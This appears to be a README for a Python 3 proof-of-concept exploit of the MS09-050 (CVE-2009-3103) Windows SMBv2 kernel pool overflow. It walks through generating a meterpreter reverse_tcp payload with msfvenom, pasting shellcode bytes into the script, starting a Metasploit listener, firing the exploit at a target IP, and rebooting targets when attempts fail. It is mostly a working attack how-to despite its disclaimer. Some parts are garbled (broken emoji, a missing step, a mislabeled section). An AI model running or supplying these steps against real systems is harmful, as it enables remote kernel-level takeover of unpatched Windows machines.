#MS09-050 Python 3 Exploit PoC This repository contains a modernized and Python 3 compatible proof-of-concept exploit for the MS09-050 (CVE-2009-3103) vulnerability. The original script was ported from Python 2 and has been refactored for clarity, reliability, and educational purposes.
๐ Disclaimer This tool is for educational and authorized security testing purposes ONLY. Do not use it on any system or network without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this script. Unauthorized hacking is illegal. Use at your own risk.
๐ Vulnerability Information CVE ID: CVE-2009-3103 Vulnerability: SMBv2 Negotiate Protocol Request Kernel Pool Overflow Description: A memory corruption vulnerability exists in the SMBv2 protocol implementation in Microsoft Windows. A specially crafted Negotiate Protocol Request can cause a kernel pool overflow, allowing a remote attacker to execute arbitrary code with kernel-level privileges. Affected Systems: Windows Vista (SP1, SP2) Windows Server 2008 (SP1, SP2) Windows 7 (Unpatched, pre-SP1) Windows Server 2008 R2 (Unpatched, pre-SP1) This exploit will NOT work on modern systems like Windows 10/11 or older systems like Windows XP.
โ๏ธ Requirements Python 3: The script is written in Python 3. rpcclient: This tool is part of the Samba suite and is required to trigger the payload.
๐ How to Use Follow these steps carefully to set up and run the exploit.
Step 1: Generate Your Shellcode You must generate your own shellcode with your LHOST (your attacking machine's IP) and LPORT. Use msfvenom for this.
Option A: Meterpreter Payload (Recommended)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=4444 -f python -o shellcode.py
(If you suspect the target is 32-bit, use windows/meterpreter/reverse_tcp)
Python
# --- Paste your custom shellcode here ---
shell = b""
# The 'buf +=' lines from your shellcode.py file go here
shell += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51"
shell += b"\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52"
# ... and so on ...
Step 3: Set Up Your Listener Open a new terminal and start your Metasploit Framework listener. Your listener's payload MUST match the one you generated with msfvenom.
For a Meterpreter Payload:
Bash
msfconsole -q msf6 > use exploit/multi/handler msf6 > set payload windows/meterpreter/reverse_tcp msf6 > set LHOST YOUR_IP_ADDRESS msf6 > set LPORT 4444 msf6 > run For a Command Shell Payload:
Bash
python3 exploit.py <TARGET_IP_ADDRESS> If successful, you will see a session open in your Metasploit console.
๐ฉบ Troubleshooting No Connection at All:
Target Not Vulnerable: Double-check that the target OS is affected and unpatched. Use the auxiliary/scanner/smb/smb_ms09_050 module in Metasploit to verify. Network/Firewall Issue: Ensure there is no firewall blocking the reverse connection from the target to your LPORT (e.g., 4444). Exploit Instability: Kernel pool exploits can be unstable. Reboot the target machine to reset its memory state and try again. This often solves the problem. ๐ Credits This script is a modernized version of the original EDB proof-of-concept by ohnozzy. Full credit goes to the original author for the exploit logic.
๐ License This project is licensed under the MIT License. See the LICENSE file for details.